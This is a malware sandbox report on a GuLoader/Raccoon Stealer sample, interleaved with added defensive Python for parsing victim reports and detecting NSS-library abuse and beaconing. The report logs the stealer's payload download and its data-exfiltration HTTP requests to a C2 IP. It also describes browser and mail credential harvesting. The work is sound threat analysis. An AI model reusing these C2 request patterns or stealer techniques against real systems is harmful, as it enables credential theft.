Analysis Report CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Overview

General Information

Sample Name: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Analysis ID: 378098
MD5: edeff76475b73d1ea8f9f8eb8afdb738
SHA1: 0ec4cf852db313d8d6c7896f4a8fd10f73228749
SHA256: a214379d617efa77932adcbd90240cf0fb0ba443b50d4f93475edde4d53b1681
Tags: exe

Detection

GuLoader, Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Raccoon Stealer
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: machineinfo.txt.4.dr.binstr Malware Configuration Extractor: Raccoon Stealer
    00000000 -> Raccoon | 1.7.3
    Build compile date: Sat Feb 27 21:25:06 2021
    Launched at: 2021.03.30 - 12:22:53 GMT
    Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user
    Running on a desktop
    -------------
    - Cookies: 1
    - Passwords: 0
    - Files: 0
    System Information:
    - System Language: English
    - System TimeZone: +1 hrs
    - IP: 84.17.52.79
    - Location: 47.431702, 8.575900 | Zurich, Zurich, Switzerland (8152)
    - ComputerName: 980108
    - Username: user
    - Windows version: NT 10.0
    - Product name: Windows 10 Pro
    - System arch: x64
    - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)
    - RAM: 8191 MB (5383 MB used)
    - Screen resolution: 1280x1024
    - Display devices:
    0) Microsoft Basic Display Adapter
    -------------
    Installed Apps:
    Adobe Acrobat Reader DC (19.012.20035)
    Adobe Refresh Manager (1.8.0)
    Google Chrome (85.0.4183.121)
    Google Update Helper (1.3.35.451)
    Java 8 Update 211 (8.0.2110.12)
    Java Auto Updater (2.8.211.12)
    Update for Skype for Business 2016 (KB4484286) 32-Bit Edition
    -------------
Note: the extractor labels this a configuration, but the source (machineinfo.txt, a file the sample dropped) and the content (launch time, item counts, host fingerprint, installed software) show it is the stealer's victim report, written to disk before exfiltration. The version string (1.7.3) and build date are the attribution fields; the IP and location are those of the analysis machine's egress, not of the operator.
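The victim report above has a fixed line format, so it can be parsed into triage fields (family version, bot ID, victim identity, how much was taken) instead of being read by eye. The following parser is an added example for this page, not Joe Sandbox or Raccoon code; its input is the report text reconstructed from the extractor output, and the field names in RaccoonReport are this example's own choice.

```python
"""Parse a Raccoon Stealer victim report (machineinfo.txt) into structured fields.

Added example for this analysis page; not Joe Sandbox or Raccoon code. The line
format is reconstructed from the extractor output; field names are ours.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: the report lines exactly as the extractor listed them.
SAMPLE_MACHINEINFO = """00000000 -> Raccoon | 1.7.3
Build compile date: Sat Feb 27 21:25:06 2021
Launched at: 2021.03.30 - 12:22:53 GMT
Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user
Running on a desktop
-------------
- Cookies: 1
- Passwords: 0
- Files: 0
System Information:
- System Language: English
- System TimeZone: +1 hrs
- IP: 84.17.52.79
- Location: 47.431702, 8.575900 | Zurich, Zurich, Switzerland (8152)
- ComputerName: 980108
- Username: user
- Windows version: NT 10.0
- Product name: Windows 10 Pro
- System arch: x64
- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)
- RAM: 8191 MB (5383 MB used)
- Screen resolution: 1280x1024
- Display devices:
0) Microsoft Basic Display Adapter
-------------
Installed Apps:
Adobe Acrobat Reader DC (19.012.20035)
Adobe Refresh Manager (1.8.0)
Google Chrome (85.0.4183.121)
Google Update Helper (1.3.35.451)
Java 8 Update 211 (8.0.2110.12)
Java Auto Updater (2.8.211.12)
Update for Skype for Business 2016 (KB4484286) 32-Bit Edition
-------------
"""


@dataclass
class RaccoonReport:
    version: Optional[str] = None
    build_date: Optional[str] = None
    launched_at: Optional[str] = None
    bot_id: Optional[str] = None
    counts: Dict[str, int] = field(default_factory=dict)      # cookies/passwords/files
    system: Dict[str, str] = field(default_factory=dict)      # host fingerprint
    display_devices: List[str] = field(default_factory=list)
    installed_apps: List[str] = field(default_factory=list)


HEADER_RE = re.compile(r"^[0-9A-Fa-f]{8} -> Raccoon \| (?P<version>[\w.]+)$")
KV_RE = re.compile(r"^-\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
DISPLAY_RE = re.compile(r"^\d+\)\s*(?P<name>.+)$")
SEPARATOR = "-------------"
NEXT_SECTION = {"header": "stats", "stats": "apps", "apps": "done"}


def parse_machineinfo(text: str) -> RaccoonReport:
    """Walk the report line by line; the dashed separator delimits its three sections."""
    report = RaccoonReport()
    section = "header"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == SEPARATOR:
            section = NEXT_SECTION.get(section, "done")
            continue
        if section == "header":
            m = HEADER_RE.match(line)
            if m:
                report.version = m.group("version")
                continue
            for label, attr in (("Build compile date", "build_date"),
                                ("Launched at", "launched_at"),
                                ("Bot_ID", "bot_id")):
                if line.startswith(label + ":"):
                    setattr(report, attr, line.split(":", 1)[1].strip())
        elif section == "stats":
            m = DISPLAY_RE.match(line)
            if m:  # enumerated adapters follow "- Display devices:"
                report.display_devices.append(m.group("name"))
                continue
            m = KV_RE.match(line)
            if not m:  # the "System Information:" heading
                continue
            key, value = m.group("key").strip(), m.group("value").strip()
            if key in ("Cookies", "Passwords", "Files") and value.isdigit():
                report.counts[key.lower()] = int(value)
            elif value:
                report.system[key] = value
        elif section == "apps":
            if line != "Installed Apps:":
                report.installed_apps.append(line)
    return report


def triage_summary(report: RaccoonReport) -> Dict[str, object]:
    """The fields an analyst pulls into a ticket: attribution, victim identity, loss."""
    return {
        "family": f"Raccoon {report.version}",
        "build_date": report.build_date,
        "bot_id": report.bot_id,
        "victim": f"{report.system.get('Username')}@{report.system.get('ComputerName')}",
        "victim_ip": report.system.get("IP"),
        "items_stolen": sum(report.counts.values()),
        "credential_targets": [a for a in report.installed_apps
                               if any(b in a for b in ("Chrome", "Firefox", "Thunderbird", "Outlook"))],
    }
```

The Bot_ID ends in the Windows user name, so the same host seen again under a different user name shows up as a different bot; correlate on ComputerName and IP as well when counting victims.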
Multi AV Scanner detection for domain / URL
Source: telete.in Virustotal: Detection: 9%
Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Compliance:

Uses 32bit PE files
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
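Two behaviours in this section are worth turning into endpoint detections: the dropped DLLs carry Thunderbird build-tree PDB paths (obj-thunderbird), which are the NSS libraries a stealer needs to call Mozilla's own decryption routines against a Firefox or Thunderbird profile, and a process that is not a browser is walking Chrome's User Data directory. The triage logic below is an added example for this page, not Joe Sandbox code. The events are constructed in Sysmon style (ImageLoad and FileOpen records as dicts); the directory the DLLs were dropped to is an assumption, since the report does not give it, while the PDB strings and the Chrome path are the ones listed above.

```python
"""Flag Mozilla NSS libraries loaded by a non-Mozilla process and browser profile
access by a non-browser process, over Sysmon-style telemetry.

Added example for this analysis page; not Joe Sandbox code. The drop directory
(DROP_DIR) is assumed; the report does not state where the DLLs were written.
"""
import ntpath
from typing import Dict, List

NSS_DLLS = {"nss3.dll", "freebl3.dll", "softokn3.dll", "nssdbm3.dll",
            "nssckbi.dll", "mozglue.dll", "lgpllibs.dll"}
MOZILLA_PROCESSES = {"firefox.exe", "thunderbird.exe"}
MOZILLA_INSTALL_DIRS = tuple(
    f"c:\\program files{suffix}\\mozilla {app}\\"
    for suffix in ("", " (x86)") for app in ("firefox", "thunderbird"))
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "thunderbird.exe"}
PROFILE_MARKERS = ("\\google\\chrome\\user data\\", "\\mozilla\\firefox\\profiles\\",
                   "\\thunderbird\\profiles\\")

SAMPLE_EXE = r"C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe"
DROP_DIR = r"C:\Users\user\AppData\Local\Temp"  # assumed; not given in the report
THUNDERBIRD_TREE = r"z:\task_1552562425\build\src\obj-thunderbird"

# Constructed telemetry: three DLL loads and one Chrome profile open by the sample,
# then two benign controls (Thunderbird loading its own nss3.dll, Chrome reading its own profile).
SAMPLE_EVENTS = [
    {"EventType": "ImageLoad", "Image": SAMPLE_EXE,
     "ImageLoaded": ntpath.join(DROP_DIR, "nss3.dll"),
     "PdbPath": THUNDERBIRD_TREE + r"\security\nss3.pdb"},
    {"EventType": "ImageLoad", "Image": SAMPLE_EXE,
     "ImageLoaded": ntpath.join(DROP_DIR, "freebl3.dll"),
     "PdbPath": THUNDERBIRD_TREE + r"\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb"},
    {"EventType": "ImageLoad", "Image": SAMPLE_EXE,
     "ImageLoaded": ntpath.join(DROP_DIR, "mozglue.dll"),
     "PdbPath": THUNDERBIRD_TREE + r"\mozglue\build\mozglue.pdb"},
    {"EventType": "FileOpen", "Image": SAMPLE_EXE,
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0"},
    {"EventType": "ImageLoad", "Image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "ImageLoaded": r"C:\Program Files\Mozilla Thunderbird\nss3.dll",
     "PdbPath": THUNDERBIRD_TREE + r"\security\nss3.pdb"},
    {"EventType": "FileOpen", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]


def evaluate_image_load(ev: Dict[str, str]) -> List[str]:
    """Reasons an NSS library load is suspicious: wrong loader, wrong location, wrong build tree."""
    dll = ntpath.basename(ev["ImageLoaded"]).lower()
    if dll not in NSS_DLLS:
        return []
    proc = ntpath.basename(ev["Image"]).lower()
    reasons: List[str] = []
    if proc not in MOZILLA_PROCESSES:
        reasons.append(f"{dll} loaded by non-Mozilla process {proc}")
    if not ev["ImageLoaded"].lower().startswith(MOZILLA_INSTALL_DIRS):
        reasons.append(f"{dll} loaded from outside a Mozilla install directory: {ev['ImageLoaded']}")
    if "obj-thunderbird" in ev.get("PdbPath", "").lower() and proc != "thunderbird.exe":
        reasons.append(f"{dll} was built from the Thunderbird tree but the loader is {proc}")
    return reasons


def evaluate_file_open(ev: Dict[str, str]) -> List[str]:
    """A non-browser process touching a browser profile directory."""
    proc = ntpath.basename(ev["Image"]).lower()
    path = ev["TargetFilename"].lower()
    if proc not in BROWSER_PROCESSES and any(m in path for m in PROFILE_MARKERS):
        return [f"{proc} opened browser profile data: {ev['TargetFilename']}"]
    return []


HANDLERS = {"ImageLoad": evaluate_image_load, "FileOpen": evaluate_file_open}


def triage_events(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group reasons by offending process image; an empty dict means nothing fired."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        reasons = HANDLERS.get(ev["EventType"], lambda _e: [])(ev)
        if reasons:
            hits.setdefault(ev["Image"], []).extend(reasons)
    return hits
```

Portable Firefox builds and backup tools will trip the install-directory and profile-access checks respectively, so treat each reason as a weight and alert on the combination (non-Mozilla loader plus user-writable path plus profile access), not on any single one.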

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:48 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:17 GMTETag: "60257d95-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 128
    Host: 45.139.236.6
Source: global traffic HTTP traffic detected:
    GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 45.139.236.6
Source: global traffic HTTP traffic detected:
    GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 45.139.236.6
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
    Content-Length: 1401
    Host: 45.139.236.6
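The four requests above share more than a missing User-Agent: the Host is an IP literal (matching the TCP connections with no DNS query), the payload GETs start with a doubled slash from a careless URL join, the Cache-Control/Pragma no-cache pair with no Accept header is what a programmatic Windows HTTP client sends rather than a browser, the check-in is a 128-byte text/plain POST, and the multipart exfiltration separates the boundary with a comma instead of a semicolon. The scorer below is an added example for this page, not sandbox or malware code; the request samples are constructed from the request lines above with CRLF line endings restored and bodies omitted, and the scoring threshold is this example's own.

```python
"""Score HTTP requests for the beaconing traits seen in this report.

Added example for this analysis page; not Joe Sandbox or malware code. Sample
requests are constructed from the report's request lines; weights are ours.
"""
import ipaddress
from typing import Dict, List, Tuple

# Constructed from the report: the check-in POST, one payload GET and the
# multipart exfiltration POST (bodies omitted).
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nContent-Type: text/plain; charset=UTF-8\r\n"
    "Content-Length: 128\r\nHost: 45.139.236.6\r\n\r\n",
    "GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1\r\n"
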